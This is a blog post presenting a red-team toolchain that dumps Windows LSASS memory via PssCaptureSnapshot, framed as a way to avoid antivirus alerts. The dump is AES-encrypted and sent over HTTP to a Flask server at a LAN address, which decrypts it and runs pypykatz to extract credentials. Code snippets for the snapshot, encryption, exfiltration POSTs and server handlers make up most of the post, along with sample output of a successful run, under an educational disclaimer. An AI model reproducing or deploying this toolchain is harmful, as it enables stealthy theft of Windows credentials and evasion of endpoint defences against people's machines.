Remote LSASS Snapshot Dump

,

Remote LSASS Snapshot Dump with AES Encryption and HTTP Exfiltration

Overview

In this post, we’ll walk through a project that captures a snapshot of LSASS (Local Security Authority Subsystem Service) using Windows APIs, encrypts the dump using AES-256 in CBC mode, and securely uploads it via HTTP to a Flask-based server. The server then decrypts and parses the data using pypykatz.

This approach avoids directly dumping LSASS to disk, leveraging modern snapshotting features (PssCaptureSnapshot) and encryption for stealth and safety.

⚠️ DISCLAIMER:
This post is intended strictly for educational purposes. The techniques and code discussed are meant to demonstrate how malware obfuscation and evasion tactics evolve, particularly in the context of defensive research, red teaming, and antivirus testing.
I do not condone the use of this information for illegal or malicious purposes and am not responsible for how others choose to use it. The code shared is not production-safe and must not be used in real-world environments without proper authorization.

Components

Client-Side (Windows C++)

  • Captures LSASS process snapshot with PssCaptureSnapshot.

  • Uses MiniDumpWriteDump to write to a temp file.

  • Encrypts the dump using AES-256-CBC via bcrypt.

  • Sends encrypted data, IV, and key via WinHTTP POST.

Server-Side (Python Flask)

  • Accepts uploads from clients at three endpoints: /upload/key, /upload/iv, /upload/dump.

  • Decrypts received dump.

  • Runs pypykatz on it to extract credentials.

AES Encryption Logic

AES encryption is implemented using the bcrypt API, which is the recommended CNG (Cryptography Next Generation) library on Windows.

1
2
bool AesEncrypt(const std::vector<BYTE>& plaintext, const std::vector<BYTE>& key,
                std::vector<BYTE>& ciphertext, std::vector<BYTE>& ivOut)

  • The key must be 16, 24, or 32 bytes (AES-128, AES-192, AES-256).

  • CBC mode is used with a randomly generated 16-byte IV.

  • The ciphertext is padded using PKCS#7 via BCRYPT_BLOCK_PADDING.

LSASS Snapshot Capture

To obtain the LSASS dump without causing antivirus alerts:

1
2
3
4
5
6
7
PssCaptureSnapshot(
    hLsass,
    PSS_CAPTURE_VA_CLONE | PSS_CAPTURE_HANDLES | PSS_CAPTURE_HANDLE_NAME_INFORMATION |
    PSS_CAPTURE_THREADS | PSS_CAPTURE_THREAD_CONTEXT,
    CONTEXT_ALL,
    &snapshotHandle
);

  • PssCaptureSnapshot creates a lightweight clone of the LSASS process.

  • MiniDumpWriteDump writes the dump to a temporary file, flagged as delete-on-close.

HTTP Upload with WinHTTP

Data is exfiltrated over HTTP:

1
2
3
HttpPost(L"192.168.1.9", L"/upload/key", key);
HttpPost(L"192.168.1.9", L"/upload/iv", iv);
HttpPost(L"192.168.1.9", L"/upload/dump", ciphertext);

  • All three components — key, IV, and dump — are sent in order.

  • The server is expected to collect and decrypt once all are received.

Flask Server Logic

The Python server receives the key, IV, and ciphertext:

1
2
3
4
@app.route('/upload/key', methods=['POST'])
def upload_key():
    ip = request.remote_addr
    save_data(ip, "key", request.data)

It stores them in memory per-client-IP, and when all are present, triggers decryption.
Decryption logic:

1
2
3
def decrypt_aes_cbc(ciphertext, key, iv):
    cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())
    return cipher.decryptor().update(ciphertext) + cipher.decryptor().finalize()

Padding is removed manually, and a known marker (e.g. "abcdefghijklmnopqurtwv") is stripped to validate the structure before saving the dump to disk.

Credential Extraction

Once the decrypted dump is written to disk, pypykatz is invoked:

1
subprocess.run(["pypykatz", "lsa", "minidump", filename])
  • If the dump is valid, pypykatz parses and prints credentials from LSASS.

Example Output

Here’s what a successful run looks like on the client:

1
2
3
4
5
6
7
8
[*] Generating AES key...
[+] Starting LSASS snapshot dump using PssCaptureSnapshot...
[*] Encrypting data...
[+] Encryption successful!
[*] Sending AES key...
[*] Sending AES IV...
[*] Sending encrypted dump...
[+] Upload completed.

And on the server:

1
2
3
4
5
6
[] Attempting decryption for 192.168.1.10...
[+] Decrypted dump saved to uploads/decrypteddump_192.168.1.10_20250601_140102.bin
[] Running pypykatz on decrypteddump...
[+] pypykatz output:
    [0] sekurlsa::logonpasswords
        ...

Security & Ethical Reminder

This project demonstrates advanced Windows internals and encryption usage and should only be used for educational purposes, security research, or red team assessments in authorized environments.

Dumping LSASS is a sensitive action and often flagged by EDR/AV solutions. Always have proper authorization.

Conclusion

This toolchain demonstrates:

  • Using modern Windows APIs (PssCaptureSnapshot) for stealthy memory capture.

  • Strong AES encryption to protect sensitive data in transit.

  • Minimal HTTP server for secure ingestion and automated credential parsing.

It’s an excellent example of combining Windows internals, cryptography, and Python scripting in a red team toolkit.